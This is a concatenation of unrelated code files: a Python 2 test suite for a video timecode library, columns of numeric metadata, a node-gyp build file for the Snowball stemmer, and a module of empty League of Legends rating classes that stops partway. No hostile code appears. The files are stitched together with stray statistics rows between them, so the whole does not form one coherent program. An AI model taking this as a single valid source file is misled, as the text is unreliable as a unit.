def setup_class(self):
""" sets shit up for
"""
pass
def teardown_class(self):
""" teardown any state that was previously setup
with a call to setup_class.
"""
pass
def test_instan(self):
timeobj = pytimecode.PyTimeCode('24', '00:00:00:00')
timeobj = pytimecode.PyTimeCode('23.98', '00:00:00:00')
timeobj = pytimecode.PyTimeCode('29.97', '00:00:00:00')
timeobj = pytimecode.PyTimeCode('30', '00:00:00:00')
timeobj = pytimecode.PyTimeCode('60', '00:00:00:00')
timeobj = pytimecode.PyTimeCode('59.94', '00:00:00:00')
timeobj = pytimecode.PyTimeCode('ms', '03:36:09:230')
timeobj = pytimecode.PyTimeCode('24', start_timecode=None, frames=12000)
def test_repr_overload(self):
timeobj = pytimecode.PyTimeCode('24', '01:00:00:00')
assert timeobj.__repr__() == '01:00:00:00'
timeobj = pytimecode.PyTimeCode('23.98', '20:00:00:00')
assert timeobj.__repr__() == '20:00:00:00'
timeobj = pytimecode.PyTimeCode('29.97', '00:09:00:00')
assert timeobj.__repr__() == '00:09:00:00'
timeobj = pytimecode.PyTimeCode('30', '00:10:00:00')
assert timeobj.__repr__() == '00:10:00:00'
timeobj = pytimecode.PyTimeCode('60', '00:00:09:00')
assert timeobj.__repr__() == '00:00:09:00'
timeobj = pytimecode.PyTimeCode('59.94', '00:00:20:00')
assert timeobj.__repr__() == '00:00:20:00'
timeobj = pytimecode.PyTimeCode('ms', '00:00:00:900')
assert timeobj.__repr__() == '00:00:00:900'
timeobj = pytimecode.PyTimeCode('24', start_timecode=None, frames=49)
print timeobj.int_framerate
assert timeobj.__repr__() == '00:00:02:01'
def test_timecode_init(self):
tc = pytimecode.PyTimeCode('29.97', '00:00:00:01', drop_frame=True)
assert tc.frames == 1
tc = pytimecode.PyTimeCode('29.97', '03:36:09:23', drop_frame=True)
assert tc.frames == 388703
tc = pytimecode.PyTimeCode('29.97', '03:36:09:23')
assert tc.frames == 389093
tc = pytimecode.PyTimeCode('30', '03:36:09:23')
assert tc.frames == 389093
tc = pytimecode.PyTimeCode('25', '03:36:09:23')
assert tc.frames == 324248
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23')
assert tc.frames == 778163
tc = pytimecode.PyTimeCode('60', '03:36:09:23')
assert tc.frames == 778163
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23', drop_frame=True)
assert tc.frames == 777383
tc = pytimecode.PyTimeCode('23.98', '03:36:09:23')
assert tc.frames == 311279
tc = pytimecode.PyTimeCode('24', '03:36:09:23')
assert tc.frames == 311279
tc = pytimecode.PyTimeCode('ms', '03:36:09:230')
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 230
tc = pytimecode.PyTimeCode('24', start_timecode=None, frames=12000)
assert tc.make_timecode() == '00:08:20:00'
tc = pytimecode.PyTimeCode('29.97', start_timecode=None, frames=2589407, drop_frame=True)
assert tc.make_timecode() == '23:59:59:29'
tc = pytimecode.PyTimeCode('29.97', start_timecode=None, frames=2589408, drop_frame=True)
assert tc.make_timecode() == '00:00:00:00'
tc = pytimecode.PyTimeCode('59.94', start_timecode=None, frames=5178815, drop_frame=True)
assert tc.make_timecode() == '23:59:59:59'
tc = pytimecode.PyTimeCode('59.94', start_timecode=None, frames=5178816, drop_frame=True)
assert tc.make_timecode() == '00:00:00:00'
def test_frame_to_tc(self):
tc = pytimecode.PyTimeCode('29.97', '00:00:00:01', drop_frame=True)
tc.frames_to_tc()
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 0
assert tc.mins == 0
assert tc.secs == 0
assert tc.frs == 1
assert tc.make_timecode() == '00:00:00:01'
tc = pytimecode.PyTimeCode('29.97', '03:36:09:23', drop_frame=True)
tc.frames_to_tc()
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('29.97', '03:36:09:23')
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('30', '03:36:09:23')
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('25', '03:36:09:23')
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23')
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('60', '03:36:09:23')
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23', drop_frame=True)
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('23.98', '03:36:09:23')
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('24', '03:36:09:23')
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 23
tc = pytimecode.PyTimeCode('ms', '03:36:09:230')
tc.frames_to_tc()
print tc.hrs, tc.mins, tc.secs, tc.frs
assert tc.hrs == 3
assert tc.mins == 36
assert tc.secs == 9
assert tc.frs == 230
tc = pytimecode.PyTimeCode('24', start_timecode=None, frames=12000)
assert tc.make_timecode() == '00:08:20:00'
assert tc.hrs == 0
assert tc.mins == 8
assert tc.secs == 20
assert tc.frs == 0
def test_drop_frame(self):
tc = pytimecode.PyTimeCode('59.94', '13:36:59:59', drop_frame=True)
timecode = tc.next()
assert timecode == "13:37:00:04"
tc = pytimecode.PyTimeCode('29.97', '13:36:59:29', drop_frame=True)
timecode = tc.next()
assert timecode == "13:37:00:02"
tc = pytimecode.PyTimeCode('59.94', '13:39:59:59', drop_frame=True)
timecode = tc.next()
assert timecode == "13:40:00:00"
tc = pytimecode.PyTimeCode('29.97', '13:39:59:29', drop_frame=True)
timecode = tc.next()
assert timecode == "13:40:00:00"
def test_iteration(self):
tc = pytimecode.PyTimeCode('29.97', '03:36:09:23', drop_frame=True)
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:11:27"
assert tc.frames == 388767
tc = pytimecode.PyTimeCode('29.97', '03:36:09:23')
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:11:23"
assert tc.frames == 389153
tc = pytimecode.PyTimeCode('30', '03:36:09:23')
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:11:23"
assert tc.frames == 389153
tc = pytimecode.PyTimeCode('25', '03:36:09:23')
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:12:08"
assert tc.frames == 324308
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23')
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:10:23"
assert tc.frames == 778223
tc = pytimecode.PyTimeCode('60', '03:36:09:23')
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:10:23"
assert tc.frames == 778223
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23', drop_frame=True)
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:10:27"
assert tc.frames == 777447
tc = pytimecode.PyTimeCode('23.98', '03:36:09:23')
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:12:11"
assert tc.frames == 311339
tc = pytimecode.PyTimeCode('24', '03:36:09:23')
for x in range(60):
t = tc.next()
assert t
assert t == "03:36:12:11"
assert tc.frames == 311339
tc = pytimecode.PyTimeCode('ms', '03:36:09:230')
for x in range(60):
t = tc.next()
assert t
assert t == '03:36:09:290'
assert tc.frames == 12969290
tc = pytimecode.PyTimeCode('24', start_timecode=None, frames=12000)
for x in range(60):
t = tc.next()
assert t
assert t == "00:08:22:12"
assert tc.frames == 12060
def test_op_overloads_add(self):
tc = pytimecode.PyTimeCode('29.97', '03:36:09:23', drop_frame=True)
tc2 = pytimecode.PyTimeCode('29.97', '00:00:29:23', drop_frame=True)
d = tc + tc2
f = tc + 893
print tc.frames, tc2.frames
assert d.make_timecode() == "03:36:39:18"
assert d.frames == 389598
assert f.make_timecode() == "03:36:39:18"
assert f.frames == 389598
tc = pytimecode.PyTimeCode('29.97', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('29.97', '00:00:29:23')
d = tc + tc2
f = tc + 893
assert d.make_timecode() == "03:36:39:16"
assert d.frames == 389986
assert f.make_timecode() == "03:36:39:16"
assert f.frames == 389986
tc = pytimecode.PyTimeCode('30', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('30', '00:00:29:23')
d = tc + tc2
f = tc + 893
assert d.make_timecode() == "03:36:39:16"
assert d.frames == 389986
assert f.make_timecode() == "03:36:39:16"
assert f.frames == 389986
tc = pytimecode.PyTimeCode('25', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('25', '00:00:29:23')
d = tc + tc2
f = tc + 748
assert d.make_timecode() == "03:36:39:21"
assert d.frames == 324996
assert f.make_timecode() == "03:36:39:21"
assert f.frames == 324996
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('59.94', '00:00:29:23')
d = tc + tc2
f = tc + 1763
assert d.make_timecode() == "03:36:38:46"
assert d.frames == 779926
assert f.make_timecode() == "03:36:38:46"
assert f.frames == 779926
tc = pytimecode.PyTimeCode('60', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('60', '00:00:29:23')
d = tc + tc2
f = tc + 1763
assert d.make_timecode() == "03:36:38:46"
assert d.frames == 779926
assert f.make_timecode() == "03:36:38:46"
assert f.frames == 779926
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23', drop_frame=True)
tc2 = pytimecode.PyTimeCode('59.94', '00:00:29:23', drop_frame=True)
d = tc + tc2
f = tc + 1763
assert d.make_timecode() == "03:36:38:50"
assert d.frames == 779150
assert f.make_timecode() == "03:36:38:50"
assert f.frames == 779150
tc = pytimecode.PyTimeCode('23.98', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('23.98', '00:00:29:23')
d = tc + tc2
f = tc + 719
assert d.make_timecode() == "03:36:39:22"
assert d.frames == 311998
assert f.make_timecode() == "03:36:39:22"
assert f.frames == 311998
tc = pytimecode.PyTimeCode('24', '03:36:09:23')
tc = pytimecode.PyTimeCode('23.98', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('23.98', '00:00:29:23')
d = tc + tc2
f = tc + 719
assert d.make_timecode() == "03:36:39:22"
assert d.frames == 311998
assert f.make_timecode() == "03:36:39:22"
assert f.frames == 311998
tc = pytimecode.PyTimeCode('ms', '03:36:09:230')
tc2 = pytimecode.PyTimeCode('ms', '01:06:09:230')
d = tc + tc2
f = tc + 719
print tc.frames, tc2.frames, d.frames
assert d.make_timecode() == "04:42:18:460"
assert d.frames == 16938460
assert f.make_timecode() == "03:36:09:949"
assert f.frames == 12969949
tc = pytimecode.PyTimeCode('24', start_timecode=None, frames=12000)
tc2 = pytimecode.PyTimeCode('24', start_timecode=None, frames=485)
d = tc + tc2
f = tc + 719
assert d.make_timecode() == "00:08:40:05"
assert d.frames == 12485
assert f.make_timecode() == "00:08:49:23"
assert f.frames == 12719
def test_op_overloads_mult(self):
tc = pytimecode.PyTimeCode('29.97', '00:00:09:23', drop_frame=True)
tc2 = pytimecode.PyTimeCode('29.97', '00:00:29:23', drop_frame=True)
d = tc * tc2
f = tc * 4
print tc.frames, tc2.frames
assert d.make_timecode() == "02:25:30:13"
assert d.frames == 261651
assert f.make_timecode() == "00:00:39:02"
assert f.frames == 1172
tc = pytimecode.PyTimeCode('29.97', '00:00:09:23')
tc2 = pytimecode.PyTimeCode('29.97', '00:00:29:23')
d = tc * tc2
f = tc * 4
assert d.make_timecode() == "02:25:21:19"
assert d.frames == 261649
assert f.make_timecode() == "00:00:39:02"
assert f.frames == 1172
tc = pytimecode.PyTimeCode('30', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('30', '00:00:29:23')
d = tc * tc2
f = tc * 893
assert d.make_timecode() == "01:13:21:19"
assert d.frames == 132049
assert f.make_timecode() == "01:13:21:19"
assert f.frames == 132049
tc = pytimecode.PyTimeCode('25', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('25', '00:00:29:23')
d = tc * tc2
f = tc * 748
assert d.make_timecode() == "06:51:40:04"
assert d.frames == 617504
assert f.make_timecode() == "06:51:40:04"
assert f.frames == 617504
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('59.94', '00:00:29:23')
d = tc * tc2
f = tc * 1763
assert d.make_timecode() == "15:23:42:49"
assert d.frames == 3325369
assert f.make_timecode() == "15:23:42:49"
assert f.frames == 3325369
tc = pytimecode.PyTimeCode('60', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('60', '00:00:29:23')
d = tc * tc2
f = tc * 1763
assert d.make_timecode() == "15:23:42:49"
assert d.frames == 3325369
assert f.make_timecode() == "15:23:42:49"
assert f.frames == 3325369
tc = pytimecode.PyTimeCode('59.94', '03:36:09:23', drop_frame=True)
tc2 = pytimecode.PyTimeCode('59.94', '00:00:29:23', drop_frame=True)
d = tc * tc2
f = tc * 1763
assert d.make_timecode() == "15:22:25:57"
assert d.frames == 3317437
assert f.make_timecode() == "15:22:25:57"
assert f.frames == 3317437
tc = pytimecode.PyTimeCode('23.98', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('23.98', '00:00:29:23')
d = tc * tc2
f = tc * 719
assert d.make_timecode() == "22:23:20:01"
assert d.frames == 1934401
assert f.make_timecode() == "22:23:20:01"
assert f.frames == 1934401
tc = pytimecode.PyTimeCode('24', '03:36:09:23')
tc = pytimecode.PyTimeCode('23.98', '03:36:09:23')
tc2 = pytimecode.PyTimeCode('23.98', '00:00:29:23')
d = tc * tc2
f = tc * 719
assert d.make_timecode() == "22:23:20:01"
assert d.frames == 1934401
assert f.make_timecode() == "22:23:20:01"
assert f.frames == 1934401
tc = pytimecode.PyTimeCode('ms', '03:36:09:230')
tc2 = pytimecode.PyTimeCode('ms', '01:06:09:230')
d = tc * tc2
f = tc * 719
print tc.frames, tc2.frames, d.frames
assert d.make_timecode() == "12:39:52:900"
assert d.frames == 45592900
assert f.make_timecode() == "22:14:36:370"
assert f.frames == 80076370
tc = pytimecode.PyTimeCode('24', start_timecode=None, frames=12000)
tc2 = pytimecode.PyTimeCode('24', start_timecode=None, frames=485)
d = tc * tc2
f = tc * 719
assert d.make_timecode() == "19:21:40:00"
assert d.frames == 1672800
assert f.make_timecode() == "03:51:40:00"
assert f.frames == 333600
def test_24_hour_limit(self):
tc = pytimecode.PyTimeCode('24', '00:00:00:21')
tc2 = pytimecode.PyTimeCode('24', '23:59:59:23')
assert (tc + tc2).make_timecode() == '00:00:00:20'
assert (tc2 + 159840001).make_timecode() == '02:00:00:00'
tc = pytimecode.PyTimeCode('29.97', '00:00:00:21')
tc2 = pytimecode.PyTimeCode('29.97', '23:59:59:29')
print (tc + tc2).frames
assert (tc + tc2).make_timecode() == '00:00:00:20'
assert (tc2 + 18360001).make_timecode() == '02:00:00:00'
tc = pytimecode.PyTimeCode('29.97', '00:00:00:01', drop_frame=True)
tc2 = pytimecode.PyTimeCode('29.97', '23:59:59:29', drop_frame=True)
tc3 = (tc2+21)
print 'yp1', tc.frames, tc2.frames, tc3.frames, tc.make_timecode()
assert tc3.make_timecode() == '00:00:00:20'
tc = pytimecode.PyTimeCode('29.97', '00:00:00:21', drop_frame=True)
tc2 = pytimecode.PyTimeCode('29.97', '23:59:59:29', drop_frame=True)
tc3 = (tc+tc2)
print 'yp2', tc.frames, tc2.frames, tc3.frames, tc.make_timecode()
assert tc3.make_timecode() == '00:00:00:20'
tc = pytimecode.PyTimeCode('29.97', '04:20:13:21', drop_frame=True)
tc2 = pytimecode.PyTimeCode('29.97', '23:59:59:29', drop_frame=True)
tc3 = (tc+tc2)
print 'yp2', tc.frames, tc2.frames, tc3.frames, tc.make_timecode()
assert tc3.make_timecode() == '04:20:13:20'
tc = pytimecode.PyTimeCode('59.94', '04:20:13:21', drop_frame=True)
tc2 = pytimecode.PyTimeCode('59.94', '23:59:59:59', drop_frame=True)
tc3 = (tc+tc2)
print 'yp2', tc.frames, tc2.frames, tc3.frames, tc.make_timecode()
assert tc3.make_timecode() == '04:20:13:20'
def test_exceptions(self):
e = None
try:
tc = pytimecode.PyTimeCode('24', '01:20:30:303')
except pytimecode.PyTimeCodeError as e:
pass
print type(e), e
assert e.__str__() == 'Timecode string parsing error. 01:20:30:303'
try:
tc = pytimecode.PyTimeCode('23.98', '01:20:30:303')
except pytimecode.PyTimeCodeError as e:
pass
print type(e), e
assert e.__str__() == 'Timecode string parsing error. 01:20:30:303'
try:
tc = pytimecode.PyTimeCode('29.97', '01:20:30:303')
except pytimecode.PyTimeCodeError as e:
pass
print type(e), e
assert e.__str__() == 'Timecode string parsing error. 01:20:30:303'
try:
tc = pytimecode.PyTimeCode('30', '01:20:30:303')
except pytimecode.PyTimeCodeError as e:
pass
print type(e), e
assert e.__str__() == 'Timecode string parsing error. 01:20:30:303'
try:
tc = pytimecode.PyTimeCode('60', '01:20:30:303')
except pytimecode.PyTimeCodeError as e:
pass
print type(e), e
assert e.__str__() == 'Timecode string parsing error. 01:20:30:303'
try:
tc = pytimecode.PyTimeCode('59.94', '01:20:30:303')
except pytimecode.PyTimeCodeError as e:
pass
print type(e), e
assert e.__str__() == 'Timecode string parsing error. 01:20:30:303'
try:
tc = pytimecode.PyTimeCode('ms', '01:20:30:3039')
except pytimecode.PyTimeCodeError as e:
pass
print type(e), e
assert e.__str__() == 'Timecode string parsing error. 01:20:30:3039'
try:
tc = pytimecode.PyTimeCode('60', '01:20:30:30', drop_frame=True)
except pytimecode.PyTimeCodeError as e:
pass
print type(e), e
assert e.__str__() == 'Drop frame with 60fps not supported, only 29.97 & 59.94.'
tc = pytimecode.PyTimeCode('29.97', '00:00:09:23', drop_frame=True)
tc2 = 'bum'
try:
d = tc * tc2
except pytimecode.PyTimeCodeError as e:
pass
assert e.__str__() == "Type <type 'str'> not supported for arithmetic."
tc = pytimecode.PyTimeCode('30', '00:00:09:23')
tc2 = 'bum'
try:
d = tc + tc2
except pytimecode.PyTimeCodeError as e:
pass
assert e.__str__() == "Type <type 'str'> not supported for arithmetic."
tc = pytimecode.PyTimeCode('24', '00:00:09:23')
tc2 = 'bum'
try:
d = tc - tc2
except pytimecode.PyTimeCodeError as e:
pass
assert e.__str__() == "Type <type 'str'> not supported for arithmetic."
tc = pytimecode.PyTimeCode('ms', '00:00:09:237')
tc2 = 'bum'
try:
d = tc / tc2
except pytimecode.PyTimeCodeError as e:
pass
assert e.__str__() == "Type <type 'str'> not supported for arithmetic."
| 41.252788
| 97
| 0.551681
| 3,113
| 22,194
| 3.862191
| 0.060713
| 0.214589
| 0.155535
| 0.029943
| 0.896365
| 0.874324
| 0.845962
| 0.803626
| 0.767113
| 0.713133
| 0
| 0.17872
| 0.294088
| 22,194
| 538
| 98
| 41.252788
| 0.58869
| 0
| 0
| 0.712355
| 0
| 0
| 0.146909
| 0
| 0
| 0
| 0
| 0
| 0.428571
| 0
| null | null | 0.027027
| 0.001931
| null | null | 0.055985
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
ab5dfee530981abe9256b28a7e1a8be9554cf998
| 2,424
|
gyp
|
Python
|
binding.gyp
|
rm-hull/node-snowball
|
9b3b02067106dbe8a61b590d1d4ce28e8c11165b
|
[
"MIT"
] | null | null | null |
binding.gyp
|
rm-hull/node-snowball
|
9b3b02067106dbe8a61b590d1d4ce28e8c11165b
|
[
"MIT"
] | null | null | null |
binding.gyp
|
rm-hull/node-snowball
|
9b3b02067106dbe8a61b590d1d4ce28e8c11165b
|
[
"MIT"
] | 1
|
2018-07-02T17:43:12.000Z
|
2018-07-02T17:43:12.000Z
|
{
"targets": [
{
"target_name": "snowball",
"include_dirs" : [
"<!(node -e \"require('nan')\")"
],
"sources": [
"src/snowball.cpp",
"src/NativeExtension.cpp",
"src/libstemmer/libstemmer/libstemmer.c",
"src/libstemmer/runtime/api.c",
"src/libstemmer/runtime/utilities.c",
"src/libstemmer/src_c/stem_ISO_8859_1_danish.c",
"src/libstemmer/src_c/stem_ISO_8859_1_dutch.c",
"src/libstemmer/src_c/stem_ISO_8859_1_english.c",
"src/libstemmer/src_c/stem_ISO_8859_1_finnish.c",
"src/libstemmer/src_c/stem_ISO_8859_1_french.c",
"src/libstemmer/src_c/stem_ISO_8859_1_german.c",
"src/libstemmer/src_c/stem_ISO_8859_1_hungarian.c",
"src/libstemmer/src_c/stem_ISO_8859_1_italian.c",
"src/libstemmer/src_c/stem_ISO_8859_1_norwegian.c",
"src/libstemmer/src_c/stem_ISO_8859_1_porter.c",
"src/libstemmer/src_c/stem_ISO_8859_1_portuguese.c",
"src/libstemmer/src_c/stem_ISO_8859_1_spanish.c",
"src/libstemmer/src_c/stem_ISO_8859_1_swedish.c",
"src/libstemmer/src_c/stem_ISO_8859_2_romanian.c",
"src/libstemmer/src_c/stem_KOI8_R_russian.c",
"src/libstemmer/src_c/stem_UTF_8_danish.c",
"src/libstemmer/src_c/stem_UTF_8_dutch.c",
"src/libstemmer/src_c/stem_UTF_8_english.c",
"src/libstemmer/src_c/stem_UTF_8_finnish.c",
"src/libstemmer/src_c/stem_UTF_8_french.c",
"src/libstemmer/src_c/stem_UTF_8_german.c",
"src/libstemmer/src_c/stem_UTF_8_hungarian.c",
"src/libstemmer/src_c/stem_UTF_8_italian.c",
"src/libstemmer/src_c/stem_UTF_8_norwegian.c",
"src/libstemmer/src_c/stem_UTF_8_porter.c",
"src/libstemmer/src_c/stem_UTF_8_portuguese.c",
"src/libstemmer/src_c/stem_UTF_8_romanian.c",
"src/libstemmer/src_c/stem_UTF_8_russian.c",
"src/libstemmer/src_c/stem_UTF_8_spanish.c",
"src/libstemmer/src_c/stem_UTF_8_swedish.c",
"src/libstemmer/src_c/stem_UTF_8_turkish.c"
]
}
]
}
| 50.5
| 68
| 0.57962
| 325
| 2,424
| 3.892308
| 0.135385
| 0.349407
| 0.365217
| 0.416601
| 0.84664
| 0.84664
| 0.84664
| 0.671146
| 0.360474
| 0
| 0
| 0.051388
| 0.301568
| 2,424
| 48
| 69
| 50.5
| 0.695806
| 0
| 0
| 0
| 0
| 0
| 0.637526
| 0.605773
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
db6b785535c4639632079aca31a74ad3391c5606
| 6,269
|
py
|
Python
|
loldib/getratings/models/NA/na_azir/na_azir_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_azir/na_azir_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_azir/na_azir_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Azir_Sup_Aatrox(Ratings):
pass
class NA_Azir_Sup_Ahri(Ratings):
pass
class NA_Azir_Sup_Akali(Ratings):
pass
class NA_Azir_Sup_Alistar(Ratings):
pass
class NA_Azir_Sup_Amumu(Ratings):
pass
class NA_Azir_Sup_Anivia(Ratings):
pass
class NA_Azir_Sup_Annie(Ratings):
pass
class NA_Azir_Sup_Ashe(Ratings):
pass
class NA_Azir_Sup_AurelionSol(Ratings):
pass
class NA_Azir_Sup_Azir(Ratings):
pass
class NA_Azir_Sup_Bard(Ratings):
pass
class NA_Azir_Sup_Blitzcrank(Ratings):
pass
class NA_Azir_Sup_Brand(Ratings):
pass
class NA_Azir_Sup_Braum(Ratings):
pass
class NA_Azir_Sup_Caitlyn(Ratings):
pass
class NA_Azir_Sup_Camille(Ratings):
pass
class NA_Azir_Sup_Cassiopeia(Ratings):
pass
class NA_Azir_Sup_Chogath(Ratings):
pass
class NA_Azir_Sup_Corki(Ratings):
pass
class NA_Azir_Sup_Darius(Ratings):
pass
class NA_Azir_Sup_Diana(Ratings):
pass
class NA_Azir_Sup_Draven(Ratings):
pass
class NA_Azir_Sup_DrMundo(Ratings):
pass
class NA_Azir_Sup_Ekko(Ratings):
pass
class NA_Azir_Sup_Elise(Ratings):
pass
class NA_Azir_Sup_Evelynn(Ratings):
pass
class NA_Azir_Sup_Ezreal(Ratings):
pass
class NA_Azir_Sup_Fiddlesticks(Ratings):
pass
class NA_Azir_Sup_Fiora(Ratings):
pass
class NA_Azir_Sup_Fizz(Ratings):
pass
class NA_Azir_Sup_Galio(Ratings):
pass
class NA_Azir_Sup_Gangplank(Ratings):
pass
class NA_Azir_Sup_Garen(Ratings):
pass
class NA_Azir_Sup_Gnar(Ratings):
pass
class NA_Azir_Sup_Gragas(Ratings):
pass
class NA_Azir_Sup_Graves(Ratings):
pass
class NA_Azir_Sup_Hecarim(Ratings):
pass
class NA_Azir_Sup_Heimerdinger(Ratings):
pass
class NA_Azir_Sup_Illaoi(Ratings):
pass
class NA_Azir_Sup_Irelia(Ratings):
pass
class NA_Azir_Sup_Ivern(Ratings):
pass
class NA_Azir_Sup_Janna(Ratings):
pass
class NA_Azir_Sup_JarvanIV(Ratings):
pass
class NA_Azir_Sup_Jax(Ratings):
pass
class NA_Azir_Sup_Jayce(Ratings):
pass
class NA_Azir_Sup_Jhin(Ratings):
pass
class NA_Azir_Sup_Jinx(Ratings):
pass
class NA_Azir_Sup_Kalista(Ratings):
pass
class NA_Azir_Sup_Karma(Ratings):
pass
class NA_Azir_Sup_Karthus(Ratings):
pass
class NA_Azir_Sup_Kassadin(Ratings):
pass
class NA_Azir_Sup_Katarina(Ratings):
pass
class NA_Azir_Sup_Kayle(Ratings):
pass
class NA_Azir_Sup_Kayn(Ratings):
pass
class NA_Azir_Sup_Kennen(Ratings):
pass
class NA_Azir_Sup_Khazix(Ratings):
pass
class NA_Azir_Sup_Kindred(Ratings):
pass
class NA_Azir_Sup_Kled(Ratings):
pass
class NA_Azir_Sup_KogMaw(Ratings):
pass
class NA_Azir_Sup_Leblanc(Ratings):
pass
class NA_Azir_Sup_LeeSin(Ratings):
pass
class NA_Azir_Sup_Leona(Ratings):
pass
class NA_Azir_Sup_Lissandra(Ratings):
pass
class NA_Azir_Sup_Lucian(Ratings):
pass
class NA_Azir_Sup_Lulu(Ratings):
pass
class NA_Azir_Sup_Lux(Ratings):
pass
class NA_Azir_Sup_Malphite(Ratings):
pass
class NA_Azir_Sup_Malzahar(Ratings):
pass
class NA_Azir_Sup_Maokai(Ratings):
pass
class NA_Azir_Sup_MasterYi(Ratings):
pass
class NA_Azir_Sup_MissFortune(Ratings):
pass
class NA_Azir_Sup_MonkeyKing(Ratings):
pass
class NA_Azir_Sup_Mordekaiser(Ratings):
pass
class NA_Azir_Sup_Morgana(Ratings):
pass
class NA_Azir_Sup_Nami(Ratings):
pass
class NA_Azir_Sup_Nasus(Ratings):
pass
class NA_Azir_Sup_Nautilus(Ratings):
pass
class NA_Azir_Sup_Nidalee(Ratings):
pass
class NA_Azir_Sup_Nocturne(Ratings):
pass
class NA_Azir_Sup_Nunu(Ratings):
pass
class NA_Azir_Sup_Olaf(Ratings):
pass
class NA_Azir_Sup_Orianna(Ratings):
pass
class NA_Azir_Sup_Ornn(Ratings):
pass
class NA_Azir_Sup_Pantheon(Ratings):
pass
class NA_Azir_Sup_Poppy(Ratings):
pass
class NA_Azir_Sup_Quinn(Ratings):
pass
class NA_Azir_Sup_Rakan(Ratings):
pass
class NA_Azir_Sup_Rammus(Ratings):
pass
class NA_Azir_Sup_RekSai(Ratings):
pass
class NA_Azir_Sup_Renekton(Ratings):
pass
class NA_Azir_Sup_Rengar(Ratings):
pass
class NA_Azir_Sup_Riven(Ratings):
pass
class NA_Azir_Sup_Rumble(Ratings):
pass
class NA_Azir_Sup_Ryze(Ratings):
pass
class NA_Azir_Sup_Sejuani(Ratings):
pass
class NA_Azir_Sup_Shaco(Ratings):
pass
class NA_Azir_Sup_Shen(Ratings):
pass
class NA_Azir_Sup_Shyvana(Ratings):
pass
class NA_Azir_Sup_Singed(Ratings):
pass
class NA_Azir_Sup_Sion(Ratings):
pass
class NA_Azir_Sup_Sivir(Ratings):
pass
class NA_Azir_Sup_Skarner(Ratings):
pass
class NA_Azir_Sup_Sona(Ratings):
pass
class NA_Azir_Sup_Soraka(Ratings):
pass
class NA_Azir_Sup_Swain(Ratings):
pass
class NA_Azir_Sup_Syndra(Ratings):
pass
class NA_Azir_Sup_TahmKench(Ratings):
pass
class NA_Azir_Sup_Taliyah(Ratings):
pass
class NA_Azir_Sup_Talon(Ratings):
pass
